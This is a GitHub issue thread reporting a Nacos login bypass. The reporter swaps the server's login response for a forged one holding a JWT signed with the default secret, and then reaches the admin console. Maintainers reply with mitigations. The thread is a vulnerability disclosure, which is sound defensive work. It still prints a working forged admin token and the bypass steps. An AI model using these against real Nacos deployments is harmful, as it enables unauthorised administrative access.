### ISSUE TITLE
Found a login background vulnerability

### ISSUE THREAD

**Issue by L0ading-x** [alibaba/nacos#7182]
The steps to reproduce.可复现问题的步骤 ![image](https://user-images.githubusercontent.com/55682875/140475848-075a12bc-8e10-4e02-becf-59c91f9abe10.png)1.Download the latest version of NacOS
https://github.com/alibaba/nacos/
2.Follow the steps for installation
3.After the installation is successful, access the default login page
![image](https://user-images.githubusercontent.com/55682875/140471673-1f00c1f2-4bbc-4e2f-a3af-a62578c6ce06.png)
4.Enter any account and password
Click login and the login failed
![image](https://user-images.githubusercontent.com/55682875/140474830-999bbf98-0501-4077-947f-77323a194ba0.png)
5.Caught at login time
![image](https://user-images.githubusercontent.com/55682875/140474983-61792caa-78ce-46f4-a166-538387322f7e.png)
Intercepting return packet
![image](https://user-images.githubusercontent.com/55682875/140475444-6270417c-e0ea-48ce-9d7a-981b3d87063e.png)
The intercepted return packet is
![image](https://user-images.githubusercontent.com/55682875/140475523-b3d7a065-0a37-44c5-b9a7-ddf387bacc41.png)
6.Replace returns the package and lets it pass
![image](https://user-images.githubusercontent.com/55682875/140475685-52337eb2-cc31-404c-97bd-5d69e0cf076a.png)
The packet is:
HTTP/1.1 200 
Server: nginx/1.19.6
Date: Sun, 11 Apr 2021 01:48:17 GMT
Content-Type: application/json;charset=UTF-8
Connection: close
Vary: Origin
Vary: Access-Control-Request-Method
Vary: Access-Control-Request-Headers
Access-Control-Allow-Origin: http://47.93.46.78:9090
Access-Control-Allow-Credentials: true
Authorization: Bearer eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTYxODEyMzY5N30.nyooAL4OMdiByXocu8kL1ooXd1IeKj6wQZwIH8nmcNA
Content-Length: 162

{"accessToken":"eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTYxODEyMzY5N30.nyooAL4OMdiByXocu8kL1ooXd1IeKj6wQZwIH8nmcNA","tokenTtl":18000,"globalAdmin":true}

7.At this point you can see that you have successfully entered the background
![image](https://user-images.githubusercontent.com/55682875/140475848-075a12bc-8e10-4e02-becf-59c91f9abe10.png)

The reason for this problem is that NACOS uses the default JWT key

**Comment by L0adinggg** [comment]
Could you please give me a way to communicate privately? I don't think it is appropriate to discuss this in issues

**Comment by ningyuan-bao** [comment]
Is there any updates on this issue? It seems that it still valid for 2.1.0.

**Comment by KomachiSion** [comment]
There is no discussion for a long time, mean community don't think this is a problem.

In fact, the token is same as you user and password, if you want to get higher security request, you can implement your own auth plugin after 2.1.0 version.

**Comment by KomachiSion** [comment]
In fact, I don't think this problem is a vulnerability. Users can set their own `token.secret.key` when they deploy clusters. 

But the CVE has include this issue, we just comment the solution:

1. upgrade 2.1.0 and develop auth private plugin for your env and company to enhance security completely. (**recommand**)
2. set private `token.secret.key` when you deploy clusters.
